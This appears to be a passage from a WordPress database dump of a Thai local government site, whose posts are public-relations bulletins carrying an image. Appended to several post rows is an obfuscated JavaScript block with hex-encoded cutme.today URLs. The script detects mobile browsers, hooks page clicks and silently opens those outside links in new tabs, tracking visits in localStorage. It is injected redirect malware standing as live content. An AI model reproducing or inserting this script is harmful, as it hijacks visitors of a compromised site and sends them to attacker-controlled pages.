x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','215-revision-v1','','','2024-07-27 22:44:50','2024-07-27 15:44:50','',215,'http://pakhaeng.ssk.in.th/?p=217',0,'revision','',0),
(218,1,'2024-07-27 22:45:20','2024-07-27 15:45:20','<!-- wp:image {\"id\":219,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/10-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-219\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-11','','','2024-07-27 22:45:22','2024-07-27 15:45:22','',0,'http://pakhaeng.ssk.in.th/?p=218',0,'post','',0),
(219,1,'2024-07-27 22:45:09','2024-07-27 15:45:09','','10-2566','','inherit','','closed','','10-2566-2','','','2024-07-27 22:45:09','2024-07-27 15:45:09','',218,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/10-2566-1.png',0,'attachment','image/png',0),
(220,1,'2024-07-27 22:45:20','2024-07-27 15:45:20','<!-- wp:image {\"id\":219,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/10-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-219\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 